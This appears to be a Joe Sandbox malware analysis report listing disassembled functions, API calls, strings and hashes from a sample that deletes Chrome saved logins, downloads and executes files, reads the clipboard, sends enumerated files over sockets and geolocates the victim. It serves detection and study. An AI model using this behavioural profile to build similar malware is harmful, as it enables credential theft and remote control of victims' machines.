                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP$['E
                                      • API String ID: 2299586839-2532616801
                                      • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                      • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                      • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                      • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                      • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                      • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                      Strings
                                      • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpen$FileRead
                                      • String ID: http://geoplugin.net/json.gp
                                      • API String ID: 3121278467-91888290
                                      • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                      • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                      • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                      • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                      • GetLastError.KERNEL32 ref: 0040BA58
                                      Strings
                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                      • [Chrome StoredLogins not found], xrefs: 0040BA72
                                      • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                      • UserProfile, xrefs: 0040BA1E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 2018770650-1062637481
                                      • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                      • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                      • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                      • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                      • GetLastError.KERNEL32 ref: 0041799D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 3534403312-3733053543
                                      • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                      • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                      • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                      • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00409258
                                        • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                      • FindClose.KERNEL32(00000000), ref: 004093C1
                                        • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                        • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                        • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                      • FindClose.KERNEL32(00000000), ref: 004095B9
                                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                      • String ID:
                                      • API String ID: 2435342581-0
                                      • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                      • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                      • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                      • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                      • String ID:
                                      • API String ID: 276877138-0
                                      • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                      • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                      • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                      • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                      • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                      • _wcschr.LIBVCRUNTIME ref: 00451E58
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                      • String ID: sJD
                                      • API String ID: 4212172061-3536923933
                                      • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                      • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                      • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                      • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                        • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                        • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                      • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                      • ExitProcess.KERNEL32 ref: 0040F8CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                      • String ID: 4.9.4 Pro$override$pth_unenc
                                      • API String ID: 2281282204-930821335
                                      • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                      • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                      • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                      • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                      • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                      • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                      • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID: SETTINGS
                                      • API String ID: 3473537107-594951305
                                      • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                      • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                      • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                      • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0040966A
                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseFirstH_prologNext
                                      • String ID:
                                      • API String ID: 1157919129-0
                                      • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                      • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                      • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                      • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00408811
                                      • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                      • String ID:
                                      • API String ID: 1771804793-0
                                      • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                      • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                      • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                      • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DownloadExecuteFileShell
                                      • String ID: C:\Users\user\AppData\Roaming\NvbYSEq.exe$open
                                      • API String ID: 2825088817-3738706228
                                      • Opcode ID: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                                      • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                      • Opcode Fuzzy Hash: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                                      • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNextsend
                                      • String ID: XPG$XPG
                                      • API String ID: 4113138495-1962359302
                                      • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                      • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                      • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                      • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                        • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                        • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                        • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateInfoParametersSystemValue
                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                      • API String ID: 4127273184-3576401099
                                      • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                      • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                      • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                      • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: PkGNG
                                      • API String ID: 0-263838557
                                      • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                      • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                      • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                      • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                      • String ID:
                                      • API String ID: 2829624132-0

                                      APIs
                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                                      • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Crypt$Context$AcquireRandomRelease
                                      • String ID:
                                      • API String ID: 1815803762-0

                                      APIs
                                      • OpenClipboard.USER32(00000000), ref: 0040B711
                                      • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                      • CloseClipboard.USER32 ref: 0040B725
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Clipboard$CloseDataOpen
                                      • String ID:
                                      • API String ID: 2058664381-0

                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID: lJD
                                      • API String ID: 1084509184-3316369744

                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID: lJD
                                      • API String ID: 1084509184-3316369744

                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: GetLocaleInfoEx
                                      • API String ID: 2299586839-2904428671

                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                      • String ID:
                                      • API String ID: 1663032902-0

                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ErrorLast$InfoLocale_abort_free
                                      • String ID:
                                      • API String ID: 2692324296-0

                                      APIs
                                      • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0

                                      APIs
                                        • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                      • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                      • String ID:
                                      • API String ID: 1272433827-0

                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0

                                      APIs
                                      • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.4 Pro), ref: 0040F8E5
                                      Memory Dump Source
